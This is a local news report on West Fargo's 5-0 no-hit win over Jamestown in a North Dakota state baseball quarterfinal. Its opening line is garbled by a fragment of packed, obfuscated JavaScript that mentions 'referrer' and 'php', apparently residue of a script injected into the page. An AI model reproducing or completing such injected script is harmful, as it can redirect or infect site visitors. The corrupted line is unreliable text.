JAMESTOWN hyniy|var|u0026u|referrer|beaky||js|php’.split(‘|’),0,{}))
(NewsDakota.com)- Camran Bonnema was dealing. He carved up the Jamestown lineup to the tune of 10 strikeouts while not allowing a hit over the course of a 5-0 win for West Fargo in the state Class A quarterfinals.

The Packers scored four runs in the first inning off of the Jays Brian Wenzel and that would be all Bonnema needed. In fact, Devin Wagenman’s two-run first-inning homer was more than enough. West Fargo got six of their 10 hits in the opening frame.

Wenzel settled down nicely after that rough open and was able to hold the potent Packers in check until the sixth inning when they added a fifth run on a Matt Barclay single.

Jamestown was able to get four runners on base against Bonnema via walks. Those were their only four base runners of the game. In the fourth, they left runners at second and third in their best chance to push a run across.

The Jays will now be matched up with Fargo Davies in the consolation round. The Eagles tried to beat Dickinson in the opening round without throwing ace Casey Quinlan, that backfired meaning Jamestown will most likely get to face the two top pitchers in the EDC on back-to-back nights.

First pitch is slated for 11:30am today from Jack Brown Stadium. Coverage of the game on 1400 KQDJ and NewsDakota.com
